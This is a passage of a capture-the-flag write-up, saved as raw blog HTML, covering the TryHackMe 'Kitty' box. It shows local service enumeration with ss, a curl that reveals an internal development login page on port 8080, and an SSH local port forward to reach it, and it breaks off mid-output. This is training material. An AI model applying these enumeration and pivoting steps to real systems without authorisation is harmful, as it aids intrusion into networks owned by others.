data-code=\"kitty@kitty:\/tmp$ ss -tunlp\nNetid       State        Recv-Q       Send-Q                 Local Address:Port                Peer Address:Port       Process       \nudp         UNCONN       0            0                      127.0.0.53%lo:53                       0.0.0.0:*                        \nudp         UNCONN       0            0                   10.10.49.10%eth0:68                       0.0.0.0:*                        \ntcp         LISTEN       0            4096                   127.0.0.53%lo:53                       0.0.0.0:*                        \ntcp         LISTEN       0            128                          0.0.0.0:22                       0.0.0.0:*                        \ntcp         LISTEN       0            70                         127.0.0.1:33060                    0.0.0.0:*                        \ntcp         LISTEN       0            151                        127.0.0.1:3306                     0.0.0.0:*                        \ntcp         LISTEN       0            511                        127.0.0.1:8080                     0.0.0.0:*                        \ntcp         LISTEN       0            128                             [::]:22                          [::]:*                        \ntcp         LISTEN       0            511                                *:80                             *:*   \" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ss<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-tunlp<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Netid<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">State<\/span><span style=\"color: #BABED8\">        <\/span><span style=\"color: #C3E88D\">Recv-Q<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">Send-Q<\/span><span style=\"color: #BABED8\">                 <\/span><span style=\"color: #C3E88D\">Local<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Address:Port<\/span><span style=\"color: #BABED8\">                <\/span><span style=\"color: #C3E88D\">Peer<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Address:Port<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #C3E88D\">Process<\/span><span style=\"color: #BABED8\">       <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">udp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">UNCONN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">                      <\/span><span style=\"color: #F78C6C\">127.0<\/span><span style=\"color: #C3E88D\">.0.53%lo:53<\/span><span style=\"color: #BABED8\">                       <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">udp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">UNCONN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #F78C6C\">10.10<\/span><span style=\"color: #C3E88D\">.49.10%eth0:68<\/span><span style=\"color: #BABED8\">                       <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">4096<\/span><span style=\"color: #BABED8\">                   <\/span><span style=\"color: #F78C6C\">127.0<\/span><span style=\"color: #C3E88D\">.0.53%lo:53<\/span><span style=\"color: #BABED8\">                       <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">128<\/span><span style=\"color: #BABED8\">                          <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:22<\/span><span style=\"color: #BABED8\">                       <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">70<\/span><span style=\"color: #BABED8\">                         <\/span><span style=\"color: #F78C6C\">127.0<\/span><span style=\"color: #C3E88D\">.0.1:33060<\/span><span style=\"color: #BABED8\">                    <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">151<\/span><span style=\"color: #BABED8\">                        <\/span><span style=\"color: #F78C6C\">127.0<\/span><span style=\"color: #C3E88D\">.0.1:3306<\/span><span style=\"color: #BABED8\">                     <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">511<\/span><span style=\"color: #BABED8\">                        <\/span><span style=\"color: #F78C6C\">127.0<\/span><span style=\"color: #C3E88D\">.0.1:8080<\/span><span style=\"color: #BABED8\">                     <\/span><span style=\"color: #F78C6C\">0.0<\/span><span style=\"color: #C3E88D\">.0.0:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">128<\/span><span style=\"color: #BABED8\">                             [::]:22                          <\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">::<\/span><span style=\"color: #89DDFF\">]<\/span><span style=\"color: #BABED8\">:<\/span><span style=\"color: #89DDFF\">*<\/span><span style=\"color: #BABED8\">                        <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">tcp<\/span><span style=\"color: #BABED8\">         <\/span><span style=\"color: #C3E88D\">LISTEN<\/span><span style=\"color: #BABED8\">       <\/span><span style=\"color: #F78C6C\">0<\/span><span style=\"color: #BABED8\">            <\/span><span style=\"color: #F78C6C\">511<\/span><span style=\"color: #BABED8\">                                <\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #C3E88D\">:80<\/span><span style=\"color: #BABED8\">                             <\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #C3E88D\">:<\/span><span style=\"color: #BABED8\">*<\/span><span style=\"color: #BABED8\">   <\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:15px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Using cURL, we can see what is running on port 8080. We can see that it is a website for &#8216;Development User Login&#8217;.<\/p>\n\n\n\n<div style=\"height:13px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"kitty@kitty:\/tmp$ curl 127.0.0.1:8080\n\n\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;title&gt;Login&lt;\/title&gt;\n    &lt;link rel=&quot;stylesheet&quot; href=&quot;https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/css\/bootstrap.min.css&quot;&gt;\n    &lt;style&gt;\n        body{ font: 14px sans-serif; }\n        .wrapper{ width: 360px; padding: 20px; }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;div class=&quot;wrapper&quot;&gt;\n        &lt;h2&gt;Development User Login&lt;\/h2&gt;\n        &lt;p&gt;Please fill in your credentials to login.&lt;\/p&gt;\n\n\n        &lt;form action=&quot;\/index.php&quot; method=&quot;post&quot;&gt;\n            &lt;div class=&quot;form-group&quot;&gt;\n                &lt;label&gt;Username&lt;\/label&gt;\n                &lt;input type=&quot;text&quot; name=&quot;username&quot; class=&quot;form-control&quot;&gt;\n            &lt;\/div&gt;    \n            &lt;div class=&quot;form-group&quot;&gt;\n                &lt;label&gt;Password&lt;\/label&gt;\n                &lt;input type=&quot;password&quot; name=&quot;password&quot; class=&quot;form-control&quot;&gt;\n            &lt;\/div&gt;\n            &lt;div class=&quot;form-group&quot;&gt;\n                &lt;input type=&quot;submit&quot; class=&quot;btn btn-primary&quot; value=&quot;Login&quot;&gt;\n\t    &lt;\/div&gt;\n\t    &lt;p&gt;Don't have an account? &lt;a href=&quot;register.php&quot;&gt;Sign up now&lt;\/a&gt;.&lt;\/p&gt;\n        &lt;\/form&gt;\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty:\/tmp$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">curl<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">127.0<\/span><span style=\"color: #C3E88D\">.0.1:8080<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;!<\/span><span style=\"color: #FFCB6B\">DOCTYPE<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">htm<\/span><span style=\"color: #BABED8\">l<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">html lang=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">en<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">head<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">meta<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">charset=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">UTF-8<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">title&gt;Login&lt;\/title&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">link<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">rel=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">stylesheet<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">href=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">https:\/\/stackpath.bootstrapcdn.com\/bootstrap\/4.5.2\/css\/bootstrap.min.css<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">style&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">        <\/span><span style=\"color: #FFCB6B\">body<\/span><span style=\"color: #BABED8\">{ <\/span><span style=\"color: #C3E88D\">font:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">14<\/span><span style=\"color: #C3E88D\">px<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">sans-serif<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">        <\/span><span style=\"color: #FFCB6B\">.wrapper<\/span><span style=\"color: #BABED8\">{ <\/span><span style=\"color: #C3E88D\">width:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">360<\/span><span style=\"color: #C3E88D\">px<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #FFCB6B\">padding:<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">20<\/span><span style=\"color: #C3E88D\">px<\/span><span style=\"color: #89DDFF\">;<\/span><span style=\"color: #BABED8\"> }<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">\/style&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">\/head<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #BABED8\">body<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">div<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">wrapper<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">        <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">h2&gt;Development<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">User<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">Login<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">\/h<\/span><span style=\"color: #89DDFF\">2&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">        <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">p&gt;Please<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">fill<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">in<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">your<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">credentials<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">to<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">login.<\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #C3E88D\">\/<\/span><span style=\"color: #BABED8\">p<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">        <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">form<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">action=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">\/index.php<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">method=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">post<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">            <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">div<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">form-group<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">label&gt;Username&lt;\/label&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">input<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">type=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">text<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">name=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">username<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">form-control<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">            <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">\/div&gt;<\/span><span style=\"color: #BABED8\">    <\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">            <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">div<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">form-group<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">label&gt;Password&lt;\/label&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">input<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">type=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">name=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">password<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">form-control<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">            <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">\/div&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">            <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">div<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">form-group<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">                <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">input<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">type=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">submit<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">class=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">btn btn-primary<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">value=<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #C3E88D\">Login<\/span><span style=\"color: #89DDFF\">&quot;<\/span><span style=\"color: #89DDFF\">&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">\/div&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #BABED8\">\t    <\/span><span style=\"color: #89DDFF\">&lt;<\/span><span style=\"color: #FFCB6B\">p&gt;Don<\/span><span style=\"color: #FFCB6B\">&#39;t have an account? &lt;a href=&quot;register.php&quot;&gt;Sign up now&lt;\/a&gt;.&lt;\/p&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">        &lt;\/form&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">    &lt;\/div&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">&lt;\/body&gt;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">&lt;\/html&gt;<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<div style=\"height:11px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>Since we have SSH access, we can do SSH port forwarding.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#0F111A\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" data-code=\"\u250c\u2500\u2500(ishsome\u327fkali)-[~\/THM\/Linux-Boxes\/Kitty]\n\u2514\u2500$ ssh -L 9090:127.0.0.1:8080 kitty@kitty.thm\nkitty@kitty.thm's password: \nWelcome to Ubuntu 20.04.5 LTS (GNU\/Linux 5.4.0-139-generic x86_64)\n\" style=\"color:#babed8;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki material-theme-ocean\" style=\"background-color: #0F111A\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #FFCB6B\">\u250c\u2500\u2500(ishsome\u327fkali<\/span><span style=\"color: #BABED8\">)-<\/span><span style=\"color: #89DDFF\">[<\/span><span style=\"color: #BABED8\">~\/THM\/Linux-Boxes\/Kitty<\/span><span style=\"color: #89DDFF\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">\u2514\u2500$<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">ssh<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">-L<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #F78C6C\">9090<\/span><span style=\"color: #C3E88D\">:127.0.0.1:8080<\/span><span style=\"color: #BABED8\"> <\/span><span style=\"color: #C3E88D\">kitty@kitty.thm<\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">kitty@kitty.thm<\/span><span style=\"color: #FFCB6B\">&#39;s password: <\/span><\/span>\n<span class=\"line\"><span style=\"color: #FFCB6B\">Welcome to Ubuntu 20.04.5 LTS (GNU\/Linux 